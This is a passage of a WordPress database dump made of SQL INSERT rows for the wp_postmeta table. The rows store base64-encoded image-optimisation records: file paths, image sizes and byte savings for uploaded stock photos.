L3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQyMjUyODk5Mi04MDB4NTgyLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzIyMywiaWQiOjMwNjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQyMjUyODk5Mi03Njh4NTU4LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTU4LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MjI1Mjg5OTItNzY4eDU1OC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDIyNTI4OTkyLTc2OHg1NTguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MjI3LCJpZCI6MzA2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDIyNTI4OTkyLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQyMjUyODk5Mi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MjI1Mjg5OTItMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcyMzEsImlkIjozMDY1fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MjI1Mjg5OTItMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDIyNTI4OTkyLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQyMjUyODk5Mi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzIzNCwiaWQiOjMwNjV9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQyMjUyODk5Mi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MjI1Mjg5OTItMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDIyNTI4OTkyLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MjM3LCJpZCI6MzA2NX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDIyNTI4OTkyLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQyMjUyODk5Mi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MjI1Mjg5OTItNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcyNDAsImlkIjozMDY1fV0='); 
INSERT INTO `wp_postmeta` VALUES (28734, 3037, 'wpfc_optimisation_reduction', '273627'); 
INSERT INTO `wp_postmeta` VALUES (28735, 3037, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzIzMDc5MDQ4Ny5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yMzA3OTA0ODcuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NjY3LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzIzMDc5MDQ4Ny5qcGciLCJyZWR1Y3Rpb24iOjI3MzYyMCwidGltZSI6MTQ4MzU0NzI1MSwiaWQiOiIzMDM3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjMwNzkwNDg3LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzIzMDc5MDQ4Ny0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yMzA3OTA0ODctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcyNTMsImlkIjozMDM3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yMzA3OTA0ODctODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjMwNzkwNDg3LTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzIzMDc5MDQ4Ny04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzI1NywiaWQiOjMwMzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzIzMDc5MDQ4Ny03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yMzA3OTA0ODctNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjMwNzkwNDg3LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MjYwLCJpZCI6MzAzN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjMwNzkwNDg3LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzIzMDc5MDQ4Ny0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yMzA3OTA0ODctMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcyNjMsImlkIjozMDM3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yMzA3OTA0ODctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjMwNzkwNDg3LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzIzMDc5MDQ4Ny0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzI2NSwiaWQiOjMwMzd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzIzMDc5MDQ4Ny0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yMzA3OTA0ODctMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjMwNzkwNDg3LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MjY3LCJpZCI6MzAzN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMjMwNzkwNDg3LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzIzMDc5MDQ4Ny01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18yMzA3OTA0ODctNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcyNzEsImlkIjozMDM3fV0='); 
INSERT INTO `wp_postmeta` VALUES (28736, 3028, 'wpfc_optimisation_reduction', '423179'); 
INSERT INTO `wp_postmeta` VALUES (28737, 3028, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM2MDU2MTUzNi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNjA1NjE1MzYuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NjY4LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM2MDU2MTUzNi5qcGciLCJyZWR1Y3Rpb24iOjQyMzE3MiwidGltZSI6MTQ4MzU0NzI4MywiaWQiOiIzMDI4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzYwNTYxNTM2LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM2MDU2MTUzNi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNjA1NjE1MzYtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcyODUsImlkIjozMDI4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNjA1NjE1MzYtODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzYwNTYxNTM2LTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM2MDU2MTUzNi04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzI4OCwiaWQiOjMwMjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM2MDU2MTUzNi03Njh4NTEzLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNjA1NjE1MzYtNzY4eDUxMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzYwNTYxNTM2LTc2OHg1MTMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3MjkxLCJpZCI6MzAyOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzYwNTYxNTM2LTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM2MDU2MTUzNi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNjA1NjE1MzYtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDcyOTMsImlkIjozMDI4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNjA1NjE1MzYtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzYwNTYxNTM2LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM2MDU2MTUzNi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzI5NSwiaWQiOjMwMjh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM2MDU2MTUzNi0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNjA1NjE1MzYtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzYwNTYxNTM2LTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3Mjk4LCJpZCI6MzAyOH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfMzYwNTYxNTM2LTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzM2MDU2MTUzNi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja18zNjA1NjE1MzYtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDczMDAsImlkIjozMDI4fV0='); 
INSERT INTO `wp_postmeta` VALUES (28738, 3018, 'wpfc_optimisation_reduction', '470240'); 
INSERT INTO `wp_postmeta` VALUES (28739, 3018, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwMTc3NDEzNy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDE3NzQxMzcuanBnIiwid2lkdGgiOjEwMDAsImhlaWdodCI6NjY3LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwMTc3NDEzNy5qcGciLCJyZWR1Y3Rpb24iOjQ3MDIzMywidGltZSI6MTQ4MzU0NzMxMCwiaWQiOiIzMDE4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDAxNzc0MTM3LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwMTc3NDEzNy0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDE3NzQxMzctMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDczMTMsImlkIjozMDE4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDE3NzQxMzctODAweDUzNC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDAxNzc0MTM3LTgwMHg1MzQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwMTc3NDEzNy04MDB4NTM0LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0NzMxNiwiaWQiOjMwMTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMVwvc2h1dHRlcnN0b2NrXzQwMTc3NDEzNy03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTFcL3NodXR0ZXJzdG9ja180MDE3NzQxMzctNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzExXC9zaHV0dGVyc3RvY2tfNDAxNzc0MTM3LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW